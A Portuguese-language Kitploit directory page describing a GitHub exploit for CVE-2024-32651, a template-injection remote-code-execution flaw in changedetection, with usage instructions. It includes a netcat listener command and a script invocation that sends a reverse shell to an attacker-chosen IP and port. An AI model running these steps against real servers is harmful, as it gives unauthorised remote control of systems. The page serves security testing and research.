Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32651-changedetection-RCE — Exploit de Injeção de Template no Lado do Servidor | Kitploit
Ferramentas/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

Exploit de Injeção de Template no Lado do Servidor

Ver Repositório
433há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32651 changedetection < 0.45.20 - Execução Remota de Código (RCE)

Exploração de Injeção de Modelo no Lado do Servidor (SSTI)!!

1. Título

Execução Remota de Código via Injeção de Modelo no Lado do Servidor (SSTI) em Aplicação Web Vulnerável

2. Descrição

Este exploit tem como alvo uma aplicação web vulnerável a Injeção de Modelo no Lado do Servidor (SSTI). Ao explorar esta vulnerabilidade, um atacante pode executar comandos arbitrários no servidor. O script Python fornecido automatiza o processo de exploração ao enviar um payload que aciona uma shell reversa.

3. Informações sobre a Vulnerabilidade

  1. ID do CVE: CVE-2024-32651
  2. Sistemas Afetados: Aplicações web que utilizam Injeção de Modelo no Lado do Servidor (SSTI) e possuem uma configuração vulnerável.

4. Prova de Conceito

Para reproduzir a vulnerabilidade, execute o script Python fornecido contra a aplicação web vulnerável. Certifique-se de que você tenha um listener (por exemplo, nc -lvp 9999) em execução para capturar a conexão da shell reversa.

5. Uso

  1. Salve o script em um arquivo chamado CVE-2024-32651.py.

  2. Instale as bibliotecas Python necessárias se ainda não estiverem instaladas:

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  3. Para usar o script, forneça os seguintes argumentos de linha de comando:

  • --url: URL base da aplicação web vulnerável (por exemplo, http://10.10.10.10:5000).
  • --port: Porta do listener (por exemplo, 9999).
  • --ip: Endereço IP do listener (por exemplo, 10.10.50.22).
  • --notification: (Opcional) URL de notificação se você quiser usar uma URL de notificação específica.
  1. Execute o script usando Python 3 com os argumentos necessários. A sintaxe é:
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. Créditos

Esta versão corrigida do exploit foi baseada em um exploit original publicado por Zach Crosman (zcrosman) com o EDB-ID: 52027. Você pode visualizar o exploit original aqui. Agradeço a Zach Crosman por sua contribuição para a comunidade de segurança.

Baixar ferramenta